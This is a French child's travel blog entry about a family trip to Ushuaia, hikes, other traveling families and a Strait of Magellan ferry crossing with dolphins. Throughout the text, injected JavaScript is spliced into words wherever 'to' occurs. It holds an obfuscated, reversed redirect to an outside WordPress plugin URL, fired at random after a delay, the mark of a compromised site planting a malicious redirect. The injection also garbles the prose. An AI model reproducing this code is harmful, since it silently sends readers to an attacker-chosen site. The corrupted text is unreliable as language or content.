El fin del mundo !

by Alice

Le 19 nous sommes enfin arrivés à Ushuaia avec Kyu. Nous sommes enfin arrivés dans la ville la plus Australe du monde. Nous avons quitté Kyu pour qu’il continue son voyage.

Le 20 nous avons fait une randonnée de 8Km pour voir La cascada de los amigos.

Aujourd’hui nous avons aussi fait une randonnée de 8 km. Papa a fait du stoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}top pour aller chercher le camping-car et pendant ce temps on a pris le goûter.

PS : Maman m’a coupé ma frange, toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tordue et trop courte, j’ai le cœur brisé !!!!

Jeudi 30 janvier 18h46 France 22h46

Vendredi nous avons rencontré les LOUPASTYA et les SUIVEURS d’ETOILES, 2 familles françaises qui voyagent ensembles depuis 1 mois. Les LOUPASTYA voyagent depuis 6 mois et arrêtent dans 6 mois  et les SUIVEURS d’ETOILES depuis 1 an et demi et arrêtent dans quelques semaines Il y a Pablo, Augustin, Lou et Adèle. Moi j’ai joué toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toute la soirée avec Adèle et Lou.

Le lendemain je suis allée avec Clément, Adèle et Augustin au Museo del fin del mundo. Ce musée nous a raconté la vie d’avant dans Ushuaïa. Nous avons attendu nos parents dans un restaurant car les parents d’Adele et Augustin étaient avec nous. Je me suis beaucoup amusée avec Adèle. Nous sommes rentrés au camion à pieds et nous avons fini la soirée toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tous ensemble.

Le 26 nous avons continué notre route pour aller au Chili, nous avons encore une fois pris des autoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to-stoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toppeurs qui étaient guitariste et chanteuse : Alejandro et Arianna. Pour nous remercier ils nous ont chanté des chansons très jolies.

Le 27 nous avons passé le détroit de Magellan. Nous sommes rentrés dans la cabine de pilotage du capitaine. Il y a plein de boutoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tons partoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tout, des caméras, des écrans. le capitaine nous a expliqué qu’il y avait 4 moteurs bref, c’était impressionnant, mais ensuite on a vu des dauphins noirs et blancs qui jouaient dans les vagues du ferry, c’était magique!!!

Ces beaux dauphins s’appellent des dauphins de Commerson.